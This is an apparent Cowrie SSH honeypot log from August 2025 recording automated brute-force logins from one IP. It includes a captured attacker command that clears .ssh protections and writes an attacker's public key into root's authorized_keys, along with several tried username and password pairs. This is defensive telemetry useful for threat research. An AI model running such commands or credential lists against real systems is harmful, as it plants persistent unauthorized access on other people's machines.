{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:25.685440Z","src_ip":"212.227.235.229","session":"1924fd3e1d6d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:26.935590Z","src_ip":"212.227.235.229","session":"1924fd3e1d6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33422,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bc3596ce53c","protocol":"ssh","message":"New connection: 212.227.235.229:33422 (1.2.3.4:22) [session: 2bc3596ce53c]","sensor":"my-vps","timestamp":"2025-08-31T04:59:27.184573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:27.185455Z","src_ip":"212.227.235.229","session":"2bc3596ce53c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:27.437330Z","src_ip":"212.227.235.229","session":"2bc3596ce53c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.198082Z","src_ip":"212.227.235.229","session":"2bc3596ce53c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47146,"dst_ip":"1.2.3.4","dst_port":22,"session":"e62f0bf7c744","protocol":"ssh","message":"New connection: 212.227.235.229:47146 (1.2.3.4:22) [session: e62f0bf7c744]","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.265913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.266766Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.447894Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.449098Z","src_ip":"212.227.235.229","session":"2bc3596ce53c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.563103Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57104,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8b02e1a5dd5","protocol":"ssh","message":"New connection: 212.227.235.229:57104 (1.2.3.4:22) [session: e8b02e1a5dd5]","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.603845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.670116Z","src_ip":"212.227.235.229","session":"e8b02e1a5dd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34188,"dst_ip":"1.2.3.4","dst_port":22,"session":"792bb2454fa4","protocol":"ssh","message":"New connection: 212.227.235.229:34188 (1.2.3.4:22) [session: 792bb2454fa4]","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.769734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.852395Z","src_ip":"212.227.235.229","session":"792bb2454fa4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:29.860674Z","src_ip":"212.227.235.229","session":"e8b02e1a5dd5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:30.060005Z","src_ip":"212.227.235.229","session":"792bb2454fa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41130,"dst_ip":"1.2.3.4","dst_port":22,"session":"704debfa9cab","protocol":"ssh","message":"New connection: 212.227.235.229:41130 (1.2.3.4:22) [session: 704debfa9cab]","sensor":"my-vps","timestamp":"2025-08-31T04:59:30.232610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:30.240958Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:30.528460Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.login.success","username":"root","password":"angga123","message":"login attempt [root/angga123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:30.792518Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.login.failed","username":"dubai","password":"dubai","message":"login attempt [dubai/dubai] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:30.946823Z","src_ip":"212.227.235.229","session":"e8b02e1a5dd5"}
{"eventid":"cowrie.login.failed","username":"ashish","password":"ashish","message":"login attempt [ashish/ashish] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:31.103086Z","src_ip":"212.227.235.229","session":"792bb2454fa4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:31.404508Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:59:31.405359Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:59:31.406407Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.login.success","username":"root","password":"#EDC4rfv%TGB","message":"login attempt [root/#EDC4rfv%TGB] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:31.696221Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:31.703429Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:59:31.972286Z","src_ip":"212.227.125.160","session":"772c8586afee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:59:31.973868Z","src_ip":"212.227.125.160","session":"772c8586afee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:32.357777Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.358456Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:32.391424Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.392093Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.393233Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.563405Z","src_ip":"212.227.235.229","session":"e8b02e1a5dd5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.656960Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.657831Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.683140Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47152,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ddf30340a50","protocol":"ssh","message":"New connection: 212.227.235.229:47152 (1.2.3.4:22) [session: 1ddf30340a50]","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.963733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:32.964643Z","src_ip":"212.227.235.229","session":"1ddf30340a50"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:33.114110Z","src_ip":"212.227.235.229","session":"792bb2454fa4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:33.266414Z","src_ip":"212.227.235.229","session":"1ddf30340a50"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:33.832752Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
